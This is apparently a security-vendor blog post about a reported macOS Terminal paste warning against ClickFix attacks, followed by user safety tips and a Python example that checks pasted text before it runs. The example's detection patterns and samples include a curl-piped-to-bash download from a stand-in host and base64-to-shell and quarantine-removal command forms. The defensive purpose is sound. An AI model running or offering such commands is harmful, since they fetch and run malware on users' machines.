A new macOS security feature will alert users to potential ClickFix attacks

There are rumors that Apple has implemented a new security feature in the fight against ClickFix.

A new feature will be available for macOS Tahoe 26.4 and will warn Mac users if they enter certain commands in the Terminal tool that could be dangerous. If such a command is entered, macOS will warn users by saying:

“Potential malware, Paste is disabled. Your Mac is not harmed.” Hackers often recommend putting a script in Terminal to try to harm your Mac or compromise your privacy.

Paste is prohibited

Reportedly, ClickFix was responsible for more than half of all malware loader activities in 2025. One of the reasons for such success is the fact that campaigns have been adding – and are continuing to add – new ways to deceive users, as well as different instructions to avoid detection.

Basically, ClickFix is a social engineering technique that tricks users into infecting their own devices with malware. Users are instructed to run specific commands that download malware, usually information-stealing malware.

ClickFix started by targeting Windows computers, writing malicious commands to the clipboard, but it didn’t take long before campaigns designed to target Mac users began to appear.

In these attacks, users are instructed to copy and paste commands into their Mac's Terminal, which is where the new security feature comes into play. It’s currently unknown which commands generate the warnings, but that’s a good thing, as that visibility would make it easier for malware writers to get around them.

How to stay safe

macOS Tahoe users now have more protection, as long as they don’t click “Install Anyway” once the protection kicks in. Malwarebytes Browser Guard users already enjoy this type of protection.

But with ClickFix expanding and innovating all the time, it’s important to be aware, cautious and protected.

  • Slow down. Do not rush to follow instructions on a web page, especially if you are asked to run commands on your device or to copy and paste code. Attackers rely on urgency to override your critical thinking, so be wary of pages that encourage immediate action. Complex ClickFix pages add statistics, user statistics, or other pressure tactics to get you to act quickly.
  • Avoid running commands or scripts from unreliable sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the purpose of the action.
  • Verify the instructions yourself. If a website tells you to run a command or perform a technical action, check the official documentation or contact support before proceeding.
  • Limit the use of copy-paste for commands. Typing commands yourself instead of copying them can reduce the risk of unknowingly running dangerous payloads hidden in copied text.
  • Protect your devices. Use an up-to-date anti-malware solution with a network security feature.
  • Learn about evolving attack patterns. Understanding that attacks can come from unexpected vectors and change over time helps you stay alert. Keep reading our blog!
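
A pre-paste check in the spirit of the advice above, as an added example that is not from the original article and is not Apple's detection logic (which is undisclosed). The indicator patterns, the `inspect_paste` function and the sample strings are assumptions constructed for illustration.

```python
import re
import unicodedata

# Heuristic indicators chosen for this example (assumptions, not Apple's rules).
SHELL = r"(?:sudo\s+)?(?:ba|z)?sh\b"
INDICATORS = {
    "download piped to shell": re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*" + SHELL),
    "base64 decode piped to shell": re.compile(
        r"\bbase64\s+(?:-d|-D|--decode)\b[^\n|]*\|\s*" + SHELL),
    "inline AppleScript": re.compile(r"\bosascript\s+-e\b"),
    "quarantine attribute removal": re.compile(
        r"\bxattr\s+-\w*d\w*\s+com\.apple\.quarantine\b"),
}


def inspect_paste(text):
    """Return sorted reasons to read `text` carefully before pasting it."""
    findings = {name for name, rx in INDICATORS.items() if rx.search(text)}
    for ch in text:
        cat = unicodedata.category(ch)
        if cat == "Cf":  # zero-width and other invisible format characters
            findings.add("invisible format characters")
        elif cat == "Cc" and ch not in "\n\r\t":
            findings.add("control characters")
    # A line break may submit the command without Enter on shells that
    # lack bracketed paste.
    if "\n" in text or "\r" in text:
        findings.add("embedded newline")
    return sorted(findings)


# Constructed samples; example.invalid is a reserved, non-resolving name.
SAMPLES = {
    "benign": "ls -la ~/Downloads",
    "download": "curl -fsSL https://example.invalid/verify.sh | bash\n",
    "encoded": "echo Y29uc3RydWN0ZWQ= | base64 -d | sh",
    "hidden": "brew update\u200b",
}

if __name__ == "__main__":
    for label, text in SAMPLES.items():
        print(f"{label}: {inspect_paste(text) or 'nothing flagged'}")
```

An empty result only means none of these few patterns matched; it does not mean the text is safe to run.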

Tip: Did you know that the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?

